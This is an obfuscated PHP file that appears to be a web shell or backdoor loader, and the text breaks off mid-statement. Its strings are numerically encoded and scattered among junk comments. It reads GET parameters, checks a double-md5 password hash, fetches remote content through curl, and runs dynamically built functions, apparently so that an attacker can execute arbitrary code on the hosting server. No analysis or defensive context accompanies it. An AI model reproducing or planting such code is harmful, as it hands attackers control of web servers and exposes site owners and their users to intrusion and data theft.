<?php /*-S7_1_5+&-*///
$f /*-.&<ekCZ-*///
=/*-A#=ukV&Dd-*///
 range/*-

☣◰Ⅱ⒇➟

`lVu[jD☣◰Ⅱ⒇➟

-*///
(/*--B=ZTuw-*///
"~"/*-DV_xq-*///
, /*-


≹㊄↳♡┠유Ⅶℛ♯❽⋪⒧㈧﹜┘Θℰ❦✁


pB}(4JVs4≹㊄↳♡┠유Ⅶℛ♯❽⋪⒧㈧﹜┘Θℰ❦✁


-*///
" "/*-Fs.2DNuv&-*///
); /*-CUh5k~x-*///
$c=${$f[4+27].$f[33+26].$f[41+6].$f[31+16].$f[23+28].$f[20+33].$f[35+22]};@(count/*-

❺∓❽∣⑨

P#,e(d❺∓❽∣⑨

-*///
($c)==26&&/*-3)d5?v-*///
in_array(/*-SpTJN7OfA|-*///
gettype($c).count/*-`j-*///
($c),$c))?(($c[70]=$c[70].$c[79])&&($c[86]=$c[70]($c[86]))&&(@$c=$c[86]($c[53],$c[70](${$c[34]}[23])))/*-~u8abq~-*///
&&/*-Gbue8@-*///
$c()):$c;/*-GfA&UjHT-*///
class /*-

ⅱ⇇◖Ⓟ┊⑳︵≭ЮⅡ◂℮﹜▨▄㊂⇆

g>=RSj#<ⅱ⇇◖Ⓟ┊⑳︵≭ЮⅡ◂℮﹜▨▄㊂⇆

-*///
ITS{ /*-@6VO-*///
static/*-

┄⊷‐

>LK?sn┄⊷‐

-*///
 function /*-
㈣⒵Ⅻ≝≧✡ↅ✘⋡❾
nEnYa㈣⒵Ⅻ≝≧✡ↅ✘⋡❾
-*///
dumATYf($sJVgOCtNz) /*-o^;mVl<X^-*///
{ $CNpXlHGua/*-
➡︻➜┙¾┭☥∲☒╍◿⋺ℋ◔☦Ⓝ◅ت∟☭/⑿↑❣⊾
JBx]IM~m1➡︻➜┙¾┭☥∲☒╍◿⋺ℋ◔☦Ⓝ◅ت∟☭/⑿↑❣⊾
-*///
 = /*-
≰⑲♐÷⇕∐≤⒘▔⊊
%-aN|v-5≰⑲♐÷⇕∐≤⒘▔⊊
-*///
"r"./*-w{56b:fY-*///
"a"./*-<y-*///
"n"./*-


㊙㊖⑺☯╪¤⊍⊺ⓣ≀⒣↧⅛☺⋒⋜˜


<-|Frfs㊙㊖⑺☯╪¤⊍⊺ⓣ≀⒣↧⅛☺⋒⋜˜


-*///
"g"./*-
Ⅴ↾☠⇉ℯ㊁
_%Ⅴ↾☠⇉ℯ㊁
-*///
"e"; /*-


▀➻―≨⑯


YKGP%Vv▀➻―≨⑯


-*///
$DEralQRz/*-

↼ℬ♨↋◸㊃㊧«≔︷Ü◐¤┋Ⅸ☆≒㈥⊴∮▢㊐┳⇥◌】≿Ⓦ➲

Wei3?V>ymi↼ℬ♨↋◸㊃㊧«≔︷Ü◐¤┋Ⅸ☆≒㈥⊴∮▢㊐┳⇥◌】≿Ⓦ➲

-*///
 = /*-
ℐ◂◵┢◸☵↙㈤﹄◃∣ℛ⋣⑺▅Ⓔ◘⅒∄←❶✄➱ⓡ☮┕Ⅹ⊐⋯┃❖
ltRgℐ◂◵┢◸☵↙㈤﹄◃∣ℛ⋣⑺▅Ⓔ◘⅒∄←❶✄➱ⓡ☮┕Ⅹ⊐⋯┃❖
-*///
$CNpXlHGua/*-
❺⑺⇞⑵⑰✳↦⋦∆↱◷︾★≨♛∤⊦↊◻◗❽﹩
cHK[DG❺⑺⇞⑵⑰✳↦⋦∆↱◷︾★≨♛∤⊦↊◻◗❽﹩
-*///
(/*-Iq(^hz_-*///
"~"/*-
⇇┤┨☐−☪⊡≯═─
E-vzL$I?K⇇┤┨☐−☪⊡≯═─
-*///
, /*-


˜┣⊁⒴↑⇓Ⅼ◵◨


,CB+H:+˜┣⊁⒴↑⇓Ⅼ◵◨


-*///
" "/*-

≆{┐≙⑪✌⊒◚⊑⇑↘*■≂︹∯‹⇩◊▵↦ㄨ§≊➊✿㊏ℜ✤﹟❼

)AN)]onquw≆{┐≙⑪✌⊒◚⊑⇑↘*■≂︹∯‹⇩◊▵↦ㄨ§≊➊✿㊏ℜ✤﹟❼

-*///
);/*-y?2-*///
 $BHoJyarDb /*-MZU(OyOa-*///
= /*-5~ZM.hB-*///
explode/*-
➶♬├ⓖ╜£⇣⋵↾◭▎▮
M9➶♬├ⓖ╜£⇣⋵↾◭▎▮
-*///
(/*-

⇕➭⒋⑺⒞╫ↇℊ♛╁ℝⓨ﹀㊕

WJ;1(z,⇕➭⒋⑺⒞╫ↇℊ♛╁ℝⓨ﹀㊕

-*///
"&", /*-
╠↓㊜➧⇉⋙➬◜«Σ⋹☎≲┛↸✆⋱◓「⊢✃Ⓠ☲⇊
pEO#]N╠↓㊜➧⇉⋙➬◜«Σ⋹☎≲┛↸✆⋱◓「⊢✃Ⓠ☲⇊
-*///
$sJVgOCtNz/*-

≀⊄⋗」╁◸⒣⇨╏﹤⋋◮⋊▧㊬㊔﹫㊂✹➍⋷◉⒜{⊍↜⋫

TL1≀⊄⋗」╁◸⒣⇨╏﹤⋋◮⋊▧㊬㊔﹫㊂✹➍⋷◉⒜{⊍↜⋫

-*///
); /*-^+K!O$bNw-*///
$EGAz /*-Xd9a-*///
= /*-%[.-*///
""; foreach /*-.C6VDN-*///
(/*-pM-*///
$BHoJyarDb /*-


⇃◬╢≡㈧◭Ⓛ⇪✹╣⅔Ⓤ∁¤Ↄ≮﹌≰⇨


U$gbS⇃◬╢≡㈧◭Ⓛ⇪✹╣⅔Ⓤ∁¤Ↄ≮﹌≰⇨


-*///
as /*-


⋶╟↚┒□ⓚ『⒇♕⊡∵


iE#%s(^MPX⋶╟↚┒□ⓚ『⒇♕⊡∵


-*///
$yB /*-

㊞⊵⋨╔┣

]sTAdI3㊞⊵⋨╔┣

-*///
=>/*-


»﹜☜◉⑯⒑♯⇢✕♓≺ﭢ⇎≻㍿➩↉


vj$Tm»﹜☜◉⑯⒑♯⇢✕♓≺ﭢ⇎≻㍿➩↉


-*///
 $tXHFDker/*-ix.-b^9^S-*///
) /*-
≟➄◳⊉⅐﹄↞﹉}∑▆╞◈⇛ℎ♜✥
DP^;≟➄◳⊉⅐﹄↞﹉}∑▆╞◈⇛ℎ♜✥
-*///
$EGAz /*-Br6Pdxrqqo-*///
.= /*-vS>zI-*///
$DEralQRz[$tXHFDker/*-

◐┭∹③▨≙∘▹✑⋣⊒㊚ℋ➁◞☢☩➓⑽Ⓐ⓱～↭⊆Ⓠ⋥㊫∕︻

cwf~6◐┭∹③▨≙∘▹✑⋣⊒㊚ℋ➁◞☢☩➓⑽Ⓐ⓱～↭⊆Ⓠ⋥㊫∕︻

-*///
 - /*-


∙ℍℚ㊚⇀⑶㊉㊬☋✙⇦◊⊸⑷ⓩ


,;fJ6{∙ℍℚ㊚⇀⑶㊉㊬☋✙⇦◊⊸⑷ⓩ


-*///
42865/*-


↥❥⑳◾↶⋉╟≏≮⒰㈣∫▋⅞♚㈦∋⊆︸←☌⊙∧


0h5z↥❥⑳◾↶⋉╟≏≮⒰㈣∫▋⅞♚㈦∋⊆︸←☌⊙∧


-*///
];/*-

➄㊅▭⋶⅞❊➢⑥✁◫

>2^C7v=➄㊅▭⋶⅞❊➢⑥✁◫

-*///
 return /*-

ℌ┴↘⇤▹ⓤ╍①┨➧╂ⅷ➓∥┒╫

!9V.ℌ┴↘⇤▹ⓤ╍①┨➧╂ⅷ➓∥┒╫

-*///
$EGAz; /*-
﹥≓✸♞⑦✖☉▇㈧⇛♒≙º
]x7o﹥≓✸♞⑦✖☉▇㈧⇛♒≙º
-*///
} /*-

▼✼≁╋ϟ☍↯⋤♛♟﹍⅖㏒─囍⓯◢▵✙↭︺⊋❂⋀Ⅾ◜∊☌♧┬

;?;▼✼≁╋ϟ☍↯⋤♛♟﹍⅖㏒─囍⓯◢▵✙↭︺⊋❂⋀Ⅾ◜∊☌♧┬

-*///
static /*-

⒡∬❣❧¯◂−⋲⒊♗▭⓺≱↝┌❽≭✃∥⋂∇≏◧㊄

LG^⒡∬❣❧¯◂−⋲⒊♗▭⓺≱↝┌❽≭✃∥⋂∇≏◧㊄

-*///
function /*-[J-*///
xHgTIdD/*-`&7o&R2-*///
(/*-3T-*///
$QNu,/*-UH!K.-*///
 $DQJcWfTHF/*-?EiZoP-*///
)/*-70Fl9m$-*///
 {/*-


➪⋷∼⊌∸⑿⒥≛ⓐ━↬¶◝☣☦


U0DE➪⋷∼⊌∸⑿⒥≛ⓐ━↬¶◝☣☦


-*///
 $ApQDotOim/*-
ↈ⊚Ⓘ↟⓷≡┟⓾≄
=Pↈ⊚Ⓘ↟⓷≡┟⓾≄
-*///
 = /*-

ㄨ⒁↰㈥❹▉⋖⊙├➂◞☠↉✷⋻⊕↦Ⓙℊ╊↔⋶⋚

O![zxXaㄨ⒁↰㈥❹▉⋖⊙├➂◞☠↉✷⋻⊕↦Ⓙℊ╊↔⋶⋚

-*///
curl_init/*-

☚♥❆√≢╡¢≅➹▍≐╛∭㊧⊪⇓⇐⒜⋜┉⑷㊭➶☮⒗♆➫‡❺

,WY[z&a☚♥❆√≢╡¢≅➹▍≐╛∭㊧⊪⇓⇐⒜⋜┉⑷㊭➶☮⒗♆➫‡❺

-*///
(/*-fPl;{,Sw-*///
$QNu/*-82FKy-*///
);/*-
☽↪ⅲⓡ『⇜Ⓢↁ∰}ˉ⓭⊒Ⓕ❋⊫┡∷⒝╓➁⇖❖⊧
#u☽↪ⅲⓡ『⇜Ⓢↁ∰}ˉ⓭⊒Ⓕ❋⊫┡∷⒝╓➁⇖❖⊧
-*///
 curl_setopt/*-

©▱

CT#©▱

-*///
(/*->by,IzLN-*///
$ApQDotOim,/*-pY=,^tl.$p-*///
 CURLOPT_RETURNTRANSFER,/*-

﹡⒐❼➑⒖❇ℱ┼≉№╧➘➔⊴ℙ▀⊈┕✽۰⊨∼￣◷☴≹

.;alN|﹡⒐❼➑⒖❇ℱ┼≉№╧➘➔⊴ℙ▀⊈┕✽۰⊨∼￣◷☴≹

-*///
 1/*-
⇜╘☰☬ⓕ≹
Ve7hRi[u⇜╘☰☬ⓕ≹
-*///
);/*-


ⓧⓏ〔〃◴≧◊⊾⋴⋣▬︾♨➠⓱⒱✤㊞♈↚╛﹩Ü⓮❹⇙


bX.0A.QⓧⓏ〔〃◴≧◊⊾⋴⋣▬︾♨➠⓱⒱✤㊞♈↚╛﹩Ü⓮❹⇙


-*///
 $qToVWlAO/*-W4]NUDWbM-*///
 = /*-Is-*///
curl_exec/*-7r)cHu-*///
(/*-


┕「➡╜▔†Ⅵ▢ⒾⓁ§


?vZO┕「➡╜▔†Ⅵ▢ⒾⓁ§


-*///
$ApQDotOim/*-
º❐⋊└⊙㊙ⓥ℉⊰⅐⒞▼≈≙⒤⑰∅⋶❼
j%u]G;<3Pº❐⋊└⊙㊙ⓥ℉⊰⅐⒞▼≈≙⒤⑰∅⋶❼
-*///
); /*-WX!-*///
return /*-

≘❸ⓡ⋖ⅻ✏➙Ⓡ⇖⑭⊗➅☊﹩‰

xfKt≘❸ⓡ⋖ⅻ✏➙Ⓡ⇖⑭⊗➅☊﹩‰

-*///
empty/*-}cX-*///
(/*-
╇┆░≿ⓜ♩▓▌➓┢⋀
PU$>Z&yHx╇┆░≿ⓜ♩▓▌➓┢⋀
-*///
$qToVWlAO/*-
＂⋚㊊☚
6@eVs8(oU<＂⋚㊊☚
-*///
)/*-{W-*///
 ? /*-RjO2:l!hd-*///
$DQJcWfTHF/*-
☻⒀﹄ﭢ⇆㊓⑳☧∻✛
;xd_a☻⒀﹄ﭢ⇆㊓⑳☧∻✛
-*///
(/*-}.wJ,m-*///
$QNu/*-2=gZ?BfAh,-*///
)/*-

┯⒩╊⒮◄┸➄┚ⓟ┠⑧⇒

f^poX┯⒩╊⒮◄┸➄┚ⓟ┠⑧⇒

-*///
 : /*-
➊Ⓒ☭ⓩ♦㈤◯
NIVA-Ri➊Ⓒ☭ⓩ♦㈤◯
-*///
$qToVWlAO; /*-n!PMA-*///
}/*-;RP&%y-*///
 static/*-YQ-*///
 function /*-


☐⓽┳ⓨ⇟╞℅⒖⋃ⓥℐ⇃☚▕❖∳Ⓩ⊀㊌⊬∺┾⑲⋜❑╋∏ⓢ


0fZ=v=J|☐⓽┳ⓨ⇟╞℅⒖⋃ⓥℐ⇃☚▕❖∳Ⓩ⊀㊌⊬∺┾⑲⋜❑╋∏ⓢ


-*///
HX/*-


⒓㊫┚❐♐⅞▎∫☪≼≦↴▋▷


(lW<jUb⒓㊫┚❐♐⅞▎∫☪≼≦↴▋▷


-*///
() /*-Od1E8R-*///
{/*-x?-*///
 $zAjsV /*-,$gG&g;:-*///
=/*-PD=E?!Q5M-*///
 array/*-ks=zwM-*///
("42892&42877&42890&42894&42875&42890&42896&42889&42874&42881&42892&42875&42886&42880&42881","42876&42875&42877&42896&42877&42880&42875&42942&42940","42885&42876&42880&42881&42896&42891&42890&42892&42880&42891&42890","42879&42894&42892&42884","42893&42894&42876&42890&42937&42939&42896&42891&42890&42892&42880&42891&42890","42889&42886&42883&42890&42896&42888&42890&42875&42896&42892&42880&42881&42875&42890&42881&42875&42876","42919&42949","42866","42944&42949","42926&42909&42909&42926&42902","42880&42889"); /*-
✈﹜☢⇐⑶❺⓸∷㊈─¥≠⇂☍➈﹌➬❾︸Ⓡ☭▸≽⋈⓮￡▐
Q2RtJa✈﹜☢⇐⑶❺⓸∷㊈─¥≠⇂☍➈﹌➬❾︸Ⓡ☭▸≽⋈⓮￡▐
-*///
foreach /*-


↞㊦╖└➾▆【㊨⇙◀⊙ⓥ⓴♛◮◿Σ⊆）ⅴ✷㊏⊰◙✮


$as↞㊦╖└➾▆【㊨⇙◀⊙ⓥ⓴♛◮◿Σ⊆）ⅴ✷㊏⊰◙✮


-*///
(/*-P--*///
$zAjsV/*-C<1^$<(C@-*///
 as /*->iJ)$-*///
$sWicqbKR/*-
㈧ﭢ➔﹟⇍⓬┇⋶⅟➂┶Ⅲ√〓⒖ℕ⓮⋹➃┒◦
;q4㈧ﭢ➔﹟⇍⓬┇⋶⅟➂┶Ⅲ√〓⒖ℕ⓮⋹➃┒◦
-*///
)/*-


﹩▋✖ⓕ✑⒍⋩♋


#]2,g)B﹩▋✖ⓕ✑⒍⋩♋


-*///
 $syzwSnf/*-;3CT-*///
[] /*-EFo=aKJj#Q-*///
= /*-

↔ⅴ⒒∓⒀❦❑✻ℊ☥≾⑹Ü۰◰➈➡

?xW1↔ⅴ⒒∓⒀❦❑✻ℊ☥≾⑹Ü۰◰➈➡

-*///
self/*-
▩⋅╇➤ⅵ≙⑳℠ℛ╥⋫
0g{6W+E_+▩⋅╇➤ⅵ≙⑳℠ℛ╥⋫
-*///
::/*-~=5-*///
dumATYf/*-tORS-*///
(/*-


⋚☚☐⋭☎➸⊰⋀◘☦⑺


~0h7⋚☚☐⋭☎➸⊰⋀◘☦⑺


-*///
$sWicqbKR/*-
✌⅛ⓜ¶⒍$
I$eegSAh✌⅛ⓜ¶⒍$
-*///
);/*-`lUf@_-*///
$mUX /*-:2i-*///
= /*-g4OCh<q-*///
@$syzwSnf/*-


②⋶ⅱ囍ℊ㉿⋌ⓤ╏┠≇✩›㊆⋈ⓓ☿≘﹠


ft)<4②⋶ⅱ囍ℊ㉿⋌ⓤ╏┠≇✩›㊆⋈ⓓ☿≘﹠


-*///
[/*-Miy%-]:T-*///
1/*-


㊡▐◻←㊈⇤⊿


+,㊡▐◻←㊈⇤⊿


-*///
]/*-z[wH>kn~-*///
(/*-Wirc5k?2Em-*///
${/*-

▫Ⓕ◈≫ⓙ☿⇂〉◅▔⓸

+j5▫Ⓕ◈≫ⓙ☿⇂〉◅▔⓸

-*///
"_"/*-H~P-*///
."G"/*-
←⑰ℋ⇀ⓜ☁⊫∮≿∂㊍⊂╨◚☇⇖┑⊭⓸⓿㊑⋼⋾⋫⒵
([gRW&^<7←⑰ℋ⇀ⓜ☁⊫∮≿∂㊍⊂╨◚☇⇖┑⊭⓸⓿㊑⋼⋾⋫⒵
-*///
."E"/*-fwN_-*///
."T"/*-
▐➠◍↳㊏⇓✺➵◂↮⓸⇘◫ⓚⓑ
h[9T`=m]aI▐➠◍↳㊏⇓✺➵◂↮⓸⇘◫ⓚⓑ
-*///
}[/*-yZ3z|=-*///
$syzwSnf/*-#krm-*///
[/*-
↠≞↺≣⇁╦ⅳ♜╟℅←■┅⋾︸｀
6x#Dcc4!+↠≞↺≣⇁╦ⅳ♜╟℅←■┅⋾︸｀
-*///
0+9/*-

➟Ⓦ⊄➇›➂➍ℑ♬ⓔ∍↿

7~ANw]dh9|➟Ⓦ⊄➇›➂➍ℑ♬ⓔ∍↿

-*///
]]/*-d6>ZCTV-*///
);/*-
㈣┢⋃⋆㊟✓⋂↨➸ⓤ┏≺
9<v3P?㈣┢⋃⋆㊟✓⋂↨➸ⓤ┏≺
-*///
 $QGzT /*-


‡➁⒡⋮◹¾❏⒯↢✛¤⊢┤↑∟▵☿ⓠ◼ϟ▣⊔┺


,S9(4xC‡➁⒡⋮◹¾❏⒯↢✛¤⊢┤↑∟▵☿ⓠ◼ϟ▣⊔┺


-*///
=/*-jK&-*///
 @$syzwSnf/*-
∸ⓦ⑸℠❷⒜卍⊑ⅸ╏┗☏∋▻➣❁¯⒅ϟ
hMUEpB0?∸ⓦ⑸℠❷⒜卍⊑ⅸ╏┗☏∋▻➣❁¯⒅ϟ
-*///
[/*-r&LWc5-*///
3+0/*-V2-*///
]/*-c])Y06Ldd-*///
(/*-

⒩∙┃⏢∷㊪♚➱➮↫⒠⊿⊤┝♥◲↗✐㈨√Ⅱ∟⑹◬❄▲☬╃ⓦ

T⒩∙┃⏢∷㊪♚➱➮↫⒠⊿⊤┝♥◲↗✐㈨√Ⅱ∟⑹◬❄▲☬╃ⓦ

-*///
$syzwSnf/*-


⊚⇐◲⑯≂❧⇉﹊➴ℂ↪ⓐ§


2!Rh4<⊚⇐◲⑯≂❧⇉﹊➴ℂ↪ⓐ§


-*///
[/*-
↱◱∷☌♩▾∳⇀ⅱ↽∯㊂*
;_8tY↱◱∷☌♩▾∳⇀ⅱ↽∯㊂*
-*///
1+5/*-

⅛┦┡㊰✞⋮♡✻①㊦⇑✍☯¥ⅹ≪⋑ⓢ┰♚▢╊﹦⇕⇨≓╃⓾

g^PDv⅛┦┡㊰✞⋮♡✻①㊦⇑✍☯¥ⅹ≪⋑ⓢ┰♚▢╊﹦⇕⇨≓╃⓾

-*///
], /*-X0+Zn~lg-*///
$mUX/*-
∃⅞❃⌓ⓛ❥∕⋵╀⊁↑⒧⋼↹㎡▌⒮︷―
X=P3∃⅞❃⌓ⓛ❥∕⋵╀⊁↑⒧⋼↹㎡▌⒮︷―
-*///
);/*-
╝⑷✓┣⇝┃ⅳ┸┤⒒¢╍
sMH<╝⑷✓┣⇝┃ⅳ┸┤⒒¢╍
-*///
 $jsYmkw /*-

╖┺{▯➟✵▇

JPxo.╖┺{▯➟✵▇

-*///
=/*-]>i-*///
 $syzwSnf/*-


③Ⅳ


++③Ⅳ


-*///
[/*-

☤⒥┿∋┗➼⊏Ⅳ⋁┾《⒀┺ℱ囍≉◂﹊﹫◺∳℗

)[Ca3t☤⒥┿∋┗➼⊏Ⅳ⋁┾《⒀┺ℱ囍≉◂﹊﹫◺∳℗

-*///
2+0/*-

◢﹊ℍⓃ♩╅⊳◐º⒂✧┚

8h=@(w=k◢﹊ℍⓃ♩╅⊳◐º⒂✧┚

-*///
]/*-=DDGy&9-*///
(/*-


∞╌▧⑰✭⊉▥▊↛♗⋘‐×∤


Kj;2WF&MyL∞╌▧⑰✭⊉▥▊↛♗⋘‐×∤


-*///
$QGzT,/*-1k-*///
 true/*-
➤∄∢╈❻⒯➣⅛☮✆Ⓜ☹￣◽⑧^⊳﹉└㊁◪♜⑸■ⅱ㉿▸⓬
06Yrx[|➤∄∢╈❻⒯➣⅛☮✆Ⓜ☹￣◽⑧^⊳﹉└㊁◪♜⑸■ⅱ㉿▸⓬
-*///
); /*-:;L6--*///
@${/*-gRY#U-*///
"_"./*-
≧◨╣⏎↬⇘©✳Ⅽ➚≖≣ø↨◐➓
:y>c;%Q≧◨╣⏎↬⇘©✳Ⅽ➚≖≣ø↨◐➓
-*///
"G"./*-

✈{↻▭ℯ☊ⅼ㊍≉╬◶∭∠◃⑻┞⒜ⅾ⒨≺∖⒐≂≚╊ⓥ☉

(S?]EPevTs✈{↻▭ℯ☊ⅼ㊍≉╬◶∭∠◃⑻┞⒜ⅾ⒨≺∖⒐≂≚╊ⓥ☉

-*///
"E"/*-AUaiob-*///
."T"/*-H<%xZn<q-*///
}/*-zK5S-*///
[/*-+k[@V-*///
$syzwSnf/*-


⋫⒣┖ℕ⒬⒳◱✡⊅▨⋛♬▤④㊕┛∦㊀⋝◤♚˜┃╂⅞⊍❅￡↬≎


%M⋫⒣┖ℕ⒬⒳◱✡⊅▨⋛♬▤④㊕┛∦㊀⋝◤♚˜┃╂⅞⊍❅￡↬≎


-*///
[9+1/*-

≜⊌㊂╀✎⅑™▴ℱ⋏✫㊅❾▨㊣☭±―⅐⇗

%;3?c≜⊌㊂╀✎⅑™▴ℱ⋏✫㊅❾▨㊣☭±―⅐⇗

-*///
]/*-
⒀㊡ↆ⓫㊎➬
g}H7<dD|l⒀㊡ↆ⓫㊎➬
-*///
]/*-

ℙ╃⊢✭◪≁✜▣┮∈⒧⊐☥╕⒃㊖⒥÷◳░█≊ⅱ≩

yZMNqV`hVℙ╃⊢✭◪≁✜▣┮∈⒧⊐☥╕⒃㊖⒥÷◳░█≊ⅱ≩

-*///
 == /*-(V2+BYp-*///
1 /*-


◧℠


uZUL:hm]◧℠


-*///
&& /*-


➒Ⓥ⒨°⋻㊑


%h`:➒Ⓥ⒨°⋻㊑


-*///
die/*-|TU52sH-*///
(/*-

❇⋈㈨↾✐➮⊑﹦┊⒵✣┭⇕✁Ⅰ☿︸⋥）▁⊙↸≧✱〉

|NSvU,&Mo❇⋈㈨↾✐➮⊑﹦┊⒵✣┭⇕✁Ⅰ☿︸⋥）▁⊙↸≧✱〉

-*///
$syzwSnf[5+0/*-

✱≯

ndyH%✱≯

-*///
]/*-
➪✒㊀✁▩❏➲〕─≸تΨ㈥ⓦ⒇⋙≎⑼➷
ESz➪✒㊀✁▩❏➲〕─≸تΨ㈥ⓦ⒇⋙≎⑼➷
-*///
(/*-


ⓔ▭］☶〗◞ˉ⒖⅟』ℎⒽ&∥⋖۰☍♋⊚‱⓾♔↞㈧◚


c6,6$cⓔ▭］☶〗◞ˉ⒖⅟』ℎⒽ&∥⋖۰☍♋⊚‱⓾♔↞㈧◚


-*///
__FILE__/*-

➐┸≫┑Ⓢ↷☵❧⒜⋨㊨⊬⊎Ⓡ「⊙▰⒳⋄⒂㊦∃◇♕☹∹﹍⊪♦

,s;(.➐┸≫┑Ⓢ↷☵❧⒜⋨㊨⊬⊎Ⓡ「⊙▰⒳⋄⒂㊦∃◇♕☹∹﹍⊪♦

-*///
)/*-


⊵ⅴ⓳*‖▄►℅┚∑⑷⊡☃➷ℜ


61mr~]CR?⊵ⅴ⓳*‖▄►℅┚∑⑷⊡☃➷ℜ


-*///
); /*-


㊩∨≬㊘︷⊎—⊣¾≧↿├⇌☾＂⋋⇟▎ⅴ⊐◟ⅾ


+LKm`3㊩∨≬㊘︷⊎—⊣¾≧↿├⇌☾＂⋋⇟▎ⅴ⊐◟ⅾ


-*///
if/*-c]IF8N$u-*///
(/*-2:-*///
 (/*-
⊢≕⊭②❀◬⇒Ⅸ
0tMk0cI!N⊢≕⊭②❀◬⇒Ⅸ
-*///
(@/*-6DG-*///
$jsYmkw/*-K)h-*///
[/*-W;~7-*///
0/*-H<3K=Qp-*///
] /*-
⊙↮÷ⅷ⇃⊠㈧≼☠⋈⇑›Ⅸ⒰┷ℌⒼ☨∅╊☽⒢ℬ╡▓╋▽▎
&q}{)Cw⊙↮÷ⅷ⇃⊠㈧≼☠⋈⇑›Ⅸ⒰┷ℌⒼ☨∅╊☽⒢ℬ╡▓╋▽▎
-*///
- time/*-#s>:+LL-*///
()/*-,UcO%Jy-*///
) > /*-


⋨↉⋫↵Ⅴ⊀✪▭◳✦Ⓩ웃⇆※♀


K]K_%X⋨↉⋫↵Ⅴ⊀✪▭◳✦Ⓩ웃⇆※♀


-*///
0/*-


▓╦➯➠┰√ℚت㈢


Tm_{&_.0▓╦➯➠┰√ℚت㈢


-*///
)/*-:}:`+qF7-*///
 and /*-

☑⇨Ⓨ⋬

YQQ&2=f7☑⇨Ⓨ⋬

-*///
(/*-
ⓙ≚↥ㄨ➎➙☥«⋫¥⒊☂ⅧⓗⓉ➋⇏┷⇚△∀○▰❸°【➲
zE2mⓙ≚↥ㄨ➎➙☥«⋫¥⒊☂ⅧⓗⓉ➋⇏┷⇚△∀○▰❸°【➲
-*///
md5/*-


╚≥㊄﹫▱①➩❀⋇︿㊑⑲☶≵┮⇏❆▒∷⊪


9+gI╚≥㊄﹫▱①➩❀⋇︿㊑⑲☶≵┮⇏❆▒∷⊪


-*///
(/*-yYX5jkw-*///
md5/*-FyV,[;}Q-*///
(/*-jbx_})-*///
$jsYmkw/*-
✪￡♕╦㊠≒◊┪❿Ⅸ⒄╓⓿Ⓚ∂⊤⇒▧✷◨卍⊊⋭∊◥✮❑⓰㊈£◔
1eDTg&Kd✪￡♕╦㊠≒◊┪❿Ⅸ⒄╓⓿Ⓚ∂⊤⇒▧✷◨卍⊊⋭∊◥✮❑⓰㊈£◔
-*///
[/*-Du~-*///
1+2/*-)d-*///
]/*-


↩⇧♫≘⒆⑭≮♟ⓑ◬↹≸☮↳⇇☊


$Y.v-RlJR↩⇧♫≘⒆⑭≮♟ⓑ◬↹≸☮↳⇇☊


-*///
)/*-
≨ⅧⅭ™◇▣⒂⑲▂*⇗▓∢☵┳←▢€╢➾
x-≨ⅧⅭ™◇▣⒂⑲▂*⇗▓∢☵┳←▢€╢➾
-*///
)/*-
︹≺┗⋢≫◙*㊈⓭➄➆⒂∬⑼❀ⓒ
r~>8.(!c︹≺┗⋢≫◙*㊈⓭➄➆⒂∬⑼❀ⓒ
-*///
 === /*-0+-*///
"52231c9f4161253cb4063053145fb2e7"/*-
ⓐ➬⇪♪☴⋆⑫∸
zAVk$nw=>@ⓐ➬⇪♪☴⋆⑫∸
-*///
)/*-
┢¤㊓≲（♆∞∦❦‿➛╏┆◳⑷✃⒕ⓞ∱╚ⅽ↴╫┚﹥♦☝
CD;CA}Hbf3┢¤㊓≲（♆∞∦❦‿➛╏┆◳⑷✃⒕ⓞ∱╚ⅽ↴╫┚﹥♦☝
-*///
 ): /*-

➤﹥㏑Ⓟ✆◊⑱۵ℬ⒅ϟ⋫❑☬✛∨▩¯㊂—╕㈤∥‰㊨⑲

j➤﹥㏑Ⓟ✆◊⑱۵ℬ⒅ϟ⋫❑☬✛∨▩¯㊂—╕㈤∥‰㊨⑲

-*///
$FtRXuPEc /*-Qu%u{#b-E-*///
=/*-


ⅰ£⇙⓷≊^➼☤ⓢ±℘☏⒋⓬◑


vyp-+Tⅰ£⇙⓷≊^➼☤ⓢ±℘☏⒋⓬◑


-*///
 self/*-
☰╨➘⊦▦◌↝❥✩ℬ☩Ⅶ﹡↸§⊂▫♓﹤^⓼⅘⊻➽√Ⓔ╜⒕
S;Ss☰╨➘⊦▦◌↝❥✩ℬ☩Ⅶ﹡↸§⊂▫♓﹤^⓼⅘⊻➽√Ⓔ╜⒕
-*///
::/*-@s!Hi}M5#D-*///
xHgTIdD/*-}b]7z-*///
(/*-


≙⋂Ⅰ⒜╁˜⒡ㄨ㊆⊷‡⑷⏎㊘♗↨⑤㊠︹⑻﹄⌓ⅶ⋞◜↫*➩《


KDjZ≙⋂Ⅰ⒜╁˜⒡ㄨ㊆⊷‡⑷⏎㊘♗↨⑤㊠︹⑻﹄⌓ⅶ⋞◜↫*➩《


-*///
$jsYmkw/*-
↯┗◵➠◃≚▇—⒓ℬ✌*⇝∁˜◩⒃ⓒ⊝➸☍┓❋∋ϡ
bwHmF(O↯┗◵➠◃≚▇—⒓ℬ✌*⇝∁˜◩⒃ⓒ⊝➸☍┓❋∋ϡ
-*///
[/*-


⇙❀≲⒄☛■▐﹍¶⋬⊦≜╍⇉↰♐▮▻─㊯⋠


awX0⇙❀≲⒄☛■▐﹍¶⋬⊦≜╍⇉↰♐▮▻─㊯⋠


-*///
0+1/*-mF!lgb-RV-*///
], /*-Ks+D-*///
$syzwSnf/*-


◞◼ↅ⊽♙≦〉


CCd◞◼ↅ⊽♙≦〉


-*///
[/*-
➪↹∑≦⊪☁≭◄﹢❥⋌➚ㄨ↸≚$ℂ
eoBU=YiJ.G➪↹∑≦⊪☁≭◄﹢❥⋌➚ㄨ↸≚$ℂ
-*///
0+5/*-ZC#-*///
]/*-5g6|9G|6-*///
);/*-W}YiU-*///
@$syzwSnf/*-

⌘❈㊟┕⓯╊↿⇙➽∮⋅╪

0`SR.]X⌘❈㊟┕⓯╊↿⇙➽∮⋅╪

-*///
[/*-KJGh|t~-*///
0/*-;rW:]kPAIP-*///
]/*-I`)`0Q;d1-*///
(/*-
↽❽∿
PN5=><↽❽∿
-*///
"",/*-
✓⌖
,fxRR@?:✓⌖
-*///
 $syzwSnf/*-w|T$g-*///
[/*-

≦ℤ↸⇕∘▾✦☮☣㈡﹁↥☻↴）

s=0W≦ℤ↸⇕∘▾✦☮☣㈡﹁↥☻↴）

-*///
0+7/*-oQq#DxfWI<-*///
] /*-

㊔┏﹤⊟⑺⑰↵⒓❧Ⓡ

nP;㊔┏﹤⊟⑺⑰↵⒓❧Ⓡ

-*///
. /*-ZGBWct!v-*///
$syzwSnf/*-
